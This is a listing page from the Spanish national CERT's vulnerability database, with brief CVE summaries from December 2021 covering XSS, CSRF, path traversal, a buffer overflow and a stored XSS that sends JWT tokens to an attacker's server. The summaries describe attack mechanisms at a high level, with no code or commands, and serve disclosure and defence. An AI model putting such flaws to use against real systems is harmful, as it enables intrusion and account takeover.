Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Go to Calendar     Go to Press Room     Go to Newsletters subscription

Search

Vulnerabilities

With the aim of informing, warning and helping professionals with the latest security vulnerabilities in technology systems, we have made a database available for users interested in this information, which is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 registers, is based on the information from the NVD (National Vulnerability Database) – by virtue of a partnership agreement – through which INCIBE translates the included information into Spanish.

On occasions this list will show vulnerabilities that have still not been translated, as they are added while the INCIBE team is still carrying out the translation process. The CVE  (Common Vulnerabilities and Exposures) Standard for Information Security Vulnerability Names is used with the aim to support the exchange of information between different tools and databases.

All vulnerabilities collected are linked to different information sources, as well as available patches or solutions provided by manufacturers and developers. It is possible to carry out advanced searches, as there is the option to select different criteria to narrow down the results, some examples being vulnerability types, manufacturers and impact levels, among others.

Through RSS feeds or Newsletters we can be informed daily about the latest vulnerabilities added to the repository. Below there is a list, updated daily, where you can discover the latest vulnerabilities.

CVE-2021-45379
Publication date:
30/12/2021
Glewlwyd 2.0.0, fixed in 2.6.1 is affected by an incorrect access control vulnerability. One user can attempt to log in as another user without its password.
Severity CVSS v4.0: Pending analysis
Last modification:
12/07/2022

CVE-2021-38876
Publication date:
30/12/2021
IBM i 7.2, 7.3, and 7.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 208404.
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2022

CVE-2020-29292
Publication date:
30/12/2021
iBall WRD12EN 1.0.0 devices allow cross-site request forgery (CSRF) attacks as demonstrated by enabling DNS settings or modifying the range for IP addresses.
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2022

CVE-2021-43862
Publication date:
30/12/2021
jQuery Terminal Emulator is a plugin for creating command line interpreters in your applications. Versions prior to 2.31.1 contain a low impact and limited cross-site scripting (XSS) vulnerability. The code for XSS payload is always visible, but an attacker can use other techniques to hide the code the victim sees. If the application uses the `execHash` option and executes code from URL, the attacker can use this URL to execute their code. The scope is limited because the javascript attribute used is added to span tag, so no automatic execution like with `onerror` on images is possible. This issue is fixed in version 2.31.1. As a workaround, the user can use formatting that wrap whole user input and its no op. The code for this workaround is available in the GitHub Security Advisory. The fix will only work when user of the library is not using different formatters (e.g. to highlight code in different way).
Severity CVSS v4.0: Pending analysis
Last modification:
09/08/2022

CVE-2021-43861
Publication date:
30/12/2021
Mermaid is a Javascript based diagramming and charting tool that uses Markdown-inspired text definitions and a renderer to create and modify complex diagrams. Prior to version 8.13.8, malicious diagrams can run javascript code at diagram readers' machines. Users should upgrade to version 8.13.8 to receive a patch. There are no known workarounds aside from upgrading.
Severity CVSS v4.0: Pending analysis
Last modification:
21/07/2023

CVE-2021-45815
Publication date:
30/12/2021
Quectel UC20 UMTS/HSPA+ UC20 6.3.14 is affected by a Cross Site Scripting (XSS) vulnerability.
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2022

CVE-2021-45818
Publication date:
30/12/2021
SAFARI Montage 8.7.32 is affected by a CRLF injection vulnerability which can lead to HTTP response splitting.
Severity CVSS v4.0: Pending analysis
Last modification:
20/01/2023

CVE-2021-45427
Publication date:
30/12/2021
Emerson XWEB 300D EVO 3.0.7--3ee403 is affected by: unauthenticated arbitrary file deletion due to path traversal. An attacker can browse and delete files without any authentication due to incorrect access control and directory traversal.
Severity CVSS v4.0: Pending analysis
Last modification:
11/01/2022

CVE-2021-4188
Publication date:
30/12/2021
mruby is vulnerable to NULL Pointer Dereference
Severity CVSS v4.0: Pending analysis
Last modification:
06/01/2022

CVE-2021-43876
Publication date:
29/12/2021
Microsoft SharePoint Elevation of Privilege Vulnerability
Severity CVSS v4.0: Pending analysis
Last modification:
28/12/2023

CVE-2021-36724
Publication date:
29/12/2021
ForeScout - SecureConnector Local Service DoS - A low privilaged user which doesn't have permissions to shutdown the secure connector service writes a large amount of characters in the installationPath. This will cause the buffer to overflow and override the stack cookie causing the service to crash.
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2022

CVE-2021-25993
Publication date:
29/12/2021
In Requarks wiki.js, versions 2.0.0-beta.147 to 2.5.255 are affected by Stored XSS vulnerability, where a low privileged (editor) user can upload a SVG file that contains malicious JavaScript while uploading assets in the page. That will send the JWT tokens to the attacker’s server and will lead to account takeover when accessed by the victim.
Severity CVSS v4.0: Pending analysis
Last modification:
06/01/2022
Subscribe to Vulnerabilities